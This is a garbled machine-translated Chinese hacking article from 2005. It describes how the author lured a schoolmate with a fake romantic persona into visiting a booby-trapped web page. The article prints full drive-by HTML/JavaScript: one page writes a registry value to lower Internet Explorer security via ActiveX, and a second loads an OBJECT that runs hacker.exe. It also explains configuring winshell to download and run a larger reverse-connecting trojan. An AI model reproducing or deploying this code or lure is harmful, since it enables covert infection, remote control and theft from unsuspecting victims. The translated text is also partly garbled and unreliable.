Web Trojan of conventional production methods-vulnerability warning-the black bar safety net

ID MYHACK58:6220053846
Type myhack58
Reporter 佚名
Modified 2005-10-20T00:00:00


Today in the morning just to school, you have a classmate said to me his QQ is others stolen! (This terrible? Bully to my buddy to head to La.) I then said to him:“rest assured., I'm sure to give you back!” In fact, my heart also not the end, the other when I can steal OICQ, then how much will a little Safety awareness! Came home from school, open my QQ, see the classmate's avatar just lit, check the IP, it seems like and I'm in the same city. According to the back of the port number, the initial judge this guy could be in the cafe because that is not the default 4 0 0 0 and 4 0 0 1 or 5 0 0 0). the I gave up invading his thoughts, because we here in the Internet cafe most of the use is 9 8 and 9 8 and very difficult to invade, so I decided to change a method. After 2 0 minutes think hard and finally I thought of a way not to boast of my high efficiency. To let him browse the web, and then infected with the Trojan. After............ But here are three issues need to be addressed: 1, How to let the other side obediently to browse the web. 2, the other in the LAN, with a conventional Trojan for sure. 3, If the Trojan server is too large, it is easy to be found. In fact, the first problem is easily solved, as long as the pretend to be a pure MM or GG cheat each other feelings on the line. The second article is also not too difficult, with a rebound type of Trojan on the line. But this Article III but not too easy to solve, because now the bounce Trojan the smallest to 3 0 more KB,if you put it on the page let the other party to browse, then certainly there will be a download box on the screen“swinging”half a day. But after my previous 2 0 more minutes of thinking, I finally came up with the following solution: 1, apply for a home space. 2, The configuration of the winshell5. 0 service end. You might ask, this Trojan is not a rebound type of Trojan horse?, why use it? Don't worry, the reason I want to use it for two reasons. A Is it the service end is very small, only 5KB or so. The second is because it has a very useful function. (As shown in Figure A to see me with a red ring up of that part? That's what I said useful features, wherein DownExec mean:“when winshell run time to automatically download the executable file and run it.” The Url Address is the executable file for the address. The Destination Filename is the download after the file name. Then, when the other run, we configured winshell, you can make him mysteriously have to go to the download real and huge rebound type of Trojan service end!


3, The winshell plus a further web page, then the page, winshell, and 和 命名 为 huigezi.exe 的 反弹 木马 服务 端 一起 上传 到 xxx.abc.com/I used here is dove gray in. After I use the“honey trap”let the kid obediently browsing my web page. Figure II is evidence!


Then how do I need not elaborate it. As for how to web page to join the Trojan program, here only to talk about my from the online to find a method, other own to study! The specific method is as follows: Open the first HTML page, by a malicious HTML code to put IE security level in the default“disable xiazai unsigned ActiveX controls”option to“Enabled under planted unsigned ActiveX controls”, and then immediately open a second HTML file content is to download an unsigned ActiveX control, in essence, is what we want to execute the EXE file. The following code is saved as index. htm file:

<! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <CNTER><HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD> <BODY> <script> document. write("<APPLET HEIGHT=0 WIDTH=0 code=com. ms. activeX. ActiveXComponent></APPLET>"); function f(){ try { //ActiveX initialization a1=document. applets[0]; a1. setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1. the createInstance(); Shl = a1. The GetObject(); a1. setCLSID("{0D43FE01-F093-11CF-8 9 4 0-00A0C9054228}"); a1. the createInstance(); FSO = a1. The GetObject(); a1. setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1. the createInstance(); Net = a1. The GetObject(); try { if (documents. cookie. indexOf("Chg") == -1) { Shl. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1 0 0 4",0,"REG_DWORD"); var expdate = new Date((new Date()). getTime() + (1)); documents. cookie="Chg=general; expires=" + expdate. toGMTString() + "; path=/;" } } catch(e) {} } catch(e) {} } function init() { setTimeout("f()", 1 0 0 0); } init(); </script>

<script language="javascript"> <!-- Begin function opencolortext(){ window. open(’http://xxx.abc.com/2.htm’,’colortext’) } setTimeout("opencolortext()",1 5 0 0) // End --> </script> </BODY></HTML>

Following the production of 2. htm file:

<! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <script language=javascript> run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" run_exe+="CODEBASE=\"hacker. exe#version=1,1,1,1\">" run_exe+="<PARAM NAME=\"_Version\" value=\"6 5 5 3 6\">" run_exe+="</OBJECT>" run_exe+="<HTML><H1> </H1></HTML>"; document. open(); document. clear(); document. writeln(run_exe); document. close(); </script>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD> <BODY> <p align="center">Forum connections do not end off.... <BR> <CENTER></CENTER><BR> <BR></BODY></HTML>

Which hacker. exe is what we want to execute the file. As for the“forum connection please do not end off....” Is entirely in order to confuse each other, according to their own preferences. 接下来 只要 将 index.htm and 2. htm and hacker. exe together with the upload to the home page in the same directory is ok! Summary: This method the advantage is, if the other in the LAN, we can also use Trojans to enter his machine and it is difficult to find. But this method also has its own disadvantages, that is, with the two Trojans, greatly increases the BE antivirus Avira probability. But the other is in the cafe, and we here in the Internet cafe mostly and not to install antivirus software and use the hard disk restore card instead, and not to upgrade IE, I this invasion is successful, the cafe owner also has a credit!